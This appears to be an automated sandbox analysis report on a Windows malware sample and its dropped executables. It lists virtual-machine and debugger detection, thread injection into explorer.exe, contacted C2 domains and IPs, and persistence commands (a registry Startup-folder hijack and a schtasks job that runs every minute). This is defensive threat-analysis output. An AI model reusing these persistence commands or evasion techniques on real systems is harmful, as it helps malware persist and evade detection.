Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Thread delayed: delay time: 60000

Source: explorer.exe, 00000004.00000000.249407167.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 4851.exe, 00000016.00000002.460568658.0000000007C48000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000004.00000000.249407167.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.268089271.0000000004DF3000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000006.00000002.527255689.0000024194863000.00000004.00000001.sdmp	Binary or memory string: $@Hyper-V RAW
Source: explorer.exe, 00000004.00000000.256353630.000000000F5C0000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.249196225.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.248687096.0000000008220000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.511226476.000001294AEC0000.00000002.00000001.sdmp, 4851.exe, 00000016.00000002.461748289.0000000008280000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.456096449.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000014.00000002.357637662.000001C4412E3000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAWSYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\{BB556C50-98D0-4585-A1ED-B2838757AE1B}
Source: explorer.exe, 00000004.00000000.244497451.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: svchost.exe, 00000006.00000002.509466837.000002418F229000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.357647178.000001C4412E9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.507835567.000001E645202000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000004.00000000.249407167.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.249407167.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.249517221.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: 4851.exe, 00000016.00000002.460568658.0000000007C48000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware4ENMFVNZWin32_VideoController11O2RL5ZVideoController120060621000000.000000-00063899635display.infMSBDAY8VKD8ADPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors3YYOBA4Am
Source: explorer.exe, 00000004.00000000.244528695.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000004.00000000.248687096.0000000008220000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.511226476.000001294AEC0000.00000002.00000001.sdmp, 4851.exe, 00000016.00000002.461748289.0000000008280000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.456096449.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.248687096.0000000008220000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.511226476.000001294AEC0000.00000002.00000001.sdmp, 4851.exe, 00000016.00000002.461748289.0000000008280000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.456096449.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: DB3B.exe, 0000001A.00000002.548729269.0000000001DE2000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: svchost.exe, 00000009.00000002.508189749.000001E645228000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.508731338.000001294A845000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.505512937.000002190C429000.00000004.00000001.sdmp, 4851.exe, 00000016.00000002.442598815.0000000002715000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000004.00000000.248687096.0000000008220000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.511226476.000001294AEC0000.00000002.00000001.sdmp, 4851.exe, 00000016.00000002.461748289.0000000008280000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.456096449.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Code function: 33_2_00404010 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetSystemMetrics,

33_2_00404010

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0041B0C2 FindFirstFileExW,	33_2_0041B0C2
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0288B312 FindFirstFileExW,	33_2_0288B312
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_0041B0C2 FindFirstFileExW,	39_2_0041B0C2

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Thread information set: HideFromDebugger

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4851.exe

22_2_004019F0

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_0041D340 LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_0041D340

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_0243092B mov eax, dword ptr fs:[00000030h]	0_2_0243092B
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_02430D90 mov eax, dword ptr fs:[00000030h]	0_2_02430D90
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_02636873 push dword ptr fs:[00000030h]	22_2_02636873
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_0284092B mov eax, dword ptr fs:[00000030h]	30_2_0284092B
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_028561A2 mov eax, dword ptr fs:[00000030h]	30_2_028561A2
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02852411 mov eax, dword ptr fs:[00000030h]	30_2_02852411
Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Code function: 30_2_02840D90 mov eax, dword ptr fs:[00000030h]	30_2_02840D90
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_004121C1 mov eax, dword ptr fs:[00000030h]	33_2_004121C1
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00415F52 mov eax, dword ptr fs:[00000030h]	33_2_00415F52
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_028861A2 mov eax, dword ptr fs:[00000030h]	33_2_028861A2
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_0287092B mov eax, dword ptr fs:[00000030h]	33_2_0287092B
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02882411 mov eax, dword ptr fs:[00000030h]	33_2_02882411
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02870D90 mov eax, dword ptr fs:[00000030h]	33_2_02870D90
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_004121C1 mov eax, dword ptr fs:[00000030h]	39_2_004121C1
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00415F52 mov eax, dword ptr fs:[00000030h]	39_2_00415F52

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_0041C5E0 IsDebuggerPresent,DebuggerProbe,

0_2_0041C5E0

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_004113A0 InterlockedIncrement,__itow_s,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcscpy_s,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,__snwprintf_s,_wcscpy_s,_wcscpy_s,__cftoe,__lock,GetFileType,_wcslen,WriteConsoleW,GetLastError,__cftoe,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,

0_2_004113A0

Source: C:\Users\user\AppData\Local\Temp\4851.exe

Code function: 22_2_0040ADB0 GetProcessHeap,HeapFree,

22_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\4851.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4851.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_004105A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004105A0
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_0041BEE0 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041BEE0
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: 0_2_0040C790 SetUnhandledExceptionFilter,	0_2_0040C790
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_004105A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_004105A0
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_0041BEE0 __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_0041BEE0
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: 18_2_0040C790 SetUnhandledExceptionFilter,	18_2_0040C790
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: 22_2_004123F1 SetUnhandledExceptionFilter,	22_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00414AA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00414AA3
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00410402 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_00410402
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_00410567 SetUnhandledExceptionFilter,	33_2_00410567
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_004107B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_004107B3
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02880A03 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_02880A03
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02880652 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_02880652
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 33_2_02884CF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_02884CF3
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00414AA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00414AA3
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00410402 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00410402
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_00410567 SetUnhandledExceptionFilter,	39_2_00410567
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Code function: 39_2_004107B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_004107B3

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: thegymmum.com
Source: C:\Windows\explorer.exe	Domain query: aucmoney.com
Source: C:\Windows\explorer.exe	Domain query: atvcampingtrips.com
Source: C:\Windows\System32\svchost.exe	Domain query: api.ip.sb
Source: C:\Windows\explorer.exe	Network Connect: 193.142.59.248 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.142.59.123 80	Jump to behavior

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: uwtjrji.4.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Code function: 33_2_00402250 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

33_2_00402250

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Thread created: C:\Windows\explorer.exe EIP: 32D1998			Jump to behavior
Source: C:\Users\user\AppData\Roaming\uwtjrji	Thread created: unknown EIP: 38A1998			Jump to behavior

.NET source code references suspicious native API functions

Show sources

Source: 26.2.DB3B.exe.13e0000.0.unpack, NativeHelper.cs	Reference to suspicious API methods: ('D42hsnHes', 'LoadLibrary@kernel32.dll'), ('Sd96RBaKO', 'GetProcAddress@kernel32.dll')
Source: 40.2.Microsoft.exe.950000.0.unpack, NativeHelper.cs	Reference to suspicious API methods: ('FgNZQxIn8', 'LoadLibrary@kernel32.dll'), ('DsphfU4Mg', 'GetProcAddress@kernel32.dll')

Source: C:\Users\user\AppData\Local\Temp\F3D5.exe	Process created: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe'
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR 'C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe' /F
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Process created: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe 'C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\bd1299733e\

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Code function: 33_2_00402A20 ShellExecuteA,

33_2_00402A20

Source: explorer.exe, 00000004.00000000.260394614.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.260756254.0000000001980000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.509429972.000001D4F5590000.00000002.00000001.sdmp, DB3B.exe, 0000001A.00000002.553554235.0000000002230000.00000002.00000001.sdmp, rnyuf.exe, 00000021.00000002.520125032.0000000002C90000.00000002.00000001.sdmp, Microsoft.exe, 00000028.00000002.529487937.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.260756254.0000000001980000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.509429972.000001D4F5590000.00000002.00000001.sdmp, DB3B.exe, 0000001A.00000002.553554235.0000000002230000.00000002.00000001.sdmp, rnyuf.exe, 00000021.00000002.520125032.0000000002C90000.00000002.00000001.sdmp, Microsoft.exe, 00000028.00000002.529487937.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.260756254.0000000001980000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.509429972.000001D4F5590000.00000002.00000001.sdmp, DB3B.exe, 0000001A.00000002.553554235.0000000002230000.00000002.00000001.sdmp, rnyuf.exe, 00000021.00000002.520125032.0000000002C90000.00000002.00000001.sdmp, Microsoft.exe, 00000028.00000002.529487937.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.260756254.0000000001980000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.509429972.000001D4F5590000.00000002.00000001.sdmp, DB3B.exe, 0000001A.00000002.553554235.0000000002230000.00000002.00000001.sdmp, rnyuf.exe, 00000021.00000002.520125032.0000000002C90000.00000002.00000001.sdmp, Microsoft.exe, 00000028.00000002.529487937.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\xuTyOmef1g.exe	Code function: GetLocaleInfoA,	0_2_0041BC10
Source: C:\Users\user\AppData\Roaming\uwtjrji	Code function: GetLocaleInfoA,	18_2_0041BC10
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Code function: GetLocaleInfoA,	22_2_00417A20

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
